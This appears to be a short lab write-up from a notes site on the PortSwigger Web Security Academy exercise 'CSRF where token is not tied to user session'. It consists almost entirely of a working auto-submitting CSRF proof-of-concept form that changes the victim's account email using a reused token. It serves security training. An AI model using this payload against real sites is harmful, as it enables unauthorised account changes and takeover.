CSRF where token is not tied to user session
PreviousCSRF where token validation depends on token being presentNextCSRF where token is tied to non-session cookie
Last updated
Last updated
<!DOCTYPE html>
<body>
<script>history.pushState('', '', '/')</script>
<h1>Form CSRF PoC</h1>
<form method="POST" action="https://0a31005504ffa87a80d4171d009e0056.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="test2@test.com">
<input type="hidden" name="csrf" value="jJY7gxzNKeNiQe4nTrrbEt88fl6cV66c">
<input type="submit" value="Submit Request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>